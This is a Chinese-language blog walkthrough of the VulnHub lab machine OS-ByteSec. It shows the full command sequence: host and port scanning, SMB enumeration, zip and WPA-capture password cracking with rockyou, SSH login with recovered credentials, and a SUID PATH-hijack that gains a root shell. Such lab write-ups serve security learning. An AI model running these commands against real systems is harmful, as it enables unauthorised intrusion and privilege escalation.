首页 > 其他分享 >vulnhub靶场OS-ByteSec

vulnhub靶场OS-ByteSec

时间:2022-11-17 21:58:58浏览次数:72  
标签:netscan 192.168 1.106 靶场 txt OS smb ByteSec vulnhub

0x000 靶场描述


难度:中级
flag:2个flag第一个用户和第二个root
学习:利用|中小企业|枚举|速记|权限提升
联系:https://www.linkedin.com/in/rahulgehlaut/


0x001 靶场下载


https://www.vulnhub.com/entry/hacknos-os-bytesec,393/


0x002 信息收集


探测存活主机

netdiscover -r 192.168.1.0/24

探测存活主机

端口扫描

nmap -sS -sV -A -p 1-65535 192.168.1.106

端口扫描

目录扫描

dirsearch -u http://192.168.1.106/

目录扫描

访问扫描到的目录,发现基本都是图片,没有什么可以利用的信息


0x003 smb服务漏洞


这里查看了别人的利用过程 https://www.cnblogs.com/f-carey/p/15953802.html#tid-6a3MAx

检测smb服务漏洞

根据前面端口扫描的结果,发现没有存在可以利用的地方。

smb服务扫描

使用smbmap枚举smb用户信息

smbmap -H 192.168.1.106

smbmap

使用enum4linux检测目标系统上的smb服务

enum4linux 192.168.1.106

enum4linux

使用 smbclient 访问目录

smbclient //192.168.1.106/smb -U smb

smbclient

发现一个main.txt文件和一个safe.zip压缩文件,下载到本地进行查看

main.txt 没有什么可用信息
safe.zip 需要输入密码

fcrackzip 破解压缩文件

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

fcrackzip

解压后,里面一个图片和一个cap文件,使用wireshark打开,但是没有发现什么可用信息。

wireshark

使用aircrack-ng暴力猜解

猜解出账号密码:blackjax/snowflake

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

aircrack-ng

ssh远程登陆

ssh [email protected] -p 2525
python3 -c 'import pty;pty.spawn("/bin/bash")' #切换为交互模式

ssh


0x004 环境变量挟持提权


查找suid权限的文件

find / -perm -u=s -type f 2>/dev/null

suid

分析netscan文件

netscan

xxd /usr/bin/netscan | less

发现netscan文件会调用netstat -anpt命令。

less

提权root

echo "/bin/sh" >netstat
chmod 777 netstat
export PATH=/tmp:$PATH

提权


0x005 查找flag


flag

标签:netscan,192.168,1.106,靶场,txt,OS,smb,ByteSec,vulnhub
From: https://www.cnblogs.com/Cx330Lm/p/16901100.html

相关文章

  • vulnhub靶场Trollcave
    0x000靶场描述Trollcave是一个易受攻击的VM,在Vulnhub和信息安全战争游戏的传统中。你从一个你一无所知的虚拟机开始-没有用户名,没有密码,只是你可以在网络上看到的东西......
  • Vulnhub之DevContainer 1靶机解题详细过程
    DevContainer1识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/DevContainer1]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.59.0/16|ScreenVi......
  • vulnhub靶场DomDom
    0x000靶场描述你对PHP程序的理解程度如何?您对Linux错误配置有多熟悉?此图像将涵盖高级Web攻击、开箱即用的思维和最新的安全漏洞。此靶场没有flag,获取到root权限即......
  • vulnhub靶场CyNix
    0x000靶场描述级别:中级描述:这是一台Boot2Root机器。该机器与VirtualBox兼容,DHCP将自动分配一个IP。您必须查找并读取两个flag(user和root),它们分别存在于user.txt和......
  • vulnhub靶场Os-hackNos-2
    0x000靶场描述难度:简单到中级flag:2个flag第一个用户和第二个根学习:Web应用程序|枚举|密码破解0x001靶场下载https://www.vulnhub.com/entry/hacknos-os-hac......
  • vulnhub靶场Os-hackNos-3
    0x000靶场描述难度:中级flag:2个flag第一个用户和第二个root学习:Web应用程序|枚举|权限提升网站:www.hacknos.com联系我们:@rahul_gehlaut0x001靶场下载https......
  • UOS本地源配置
    创建iso挂载点:root@Ispsrv:~#mkdir/mnt/uos配置永久挂载:root@Ispsrv:~#vi/etc/fstab#添加内容/dev/cdrom/mnt/uosiso9660defaults00挂载全部:root@Ispsrv:~#mount......
  • 关于PowerShell -Verbose 改变 $ErrorActionPreference 的 Bug
    问题我们定义一个function,当我们尝试删除一个不存在的文件,但是不希望有错误出现我们这么写,一切符合预期但是,我们同时希望能记录删除操作的一些信息,我们加上-verbose通......
  • 【MacOs】Go语言环境搭建
    一、下载安装Go官网下载地址:https://golang.org/dl/Go官方镜像站(推荐):https://golang.google.cn/dl/选择对应的版本:M系列(ARM64)|Inter(x86-64),双击安装,安装后查看: ......
  • CentOS检查和禁用transparent hugepages
    1.查看系统当前使用的匿名透明大页#grep-iAnonHugePages/proc/meminfoAnonHugePages:1216512kB2.查看哪些应用在使用匿名透明大页$sudoawk'/AnonHugePag......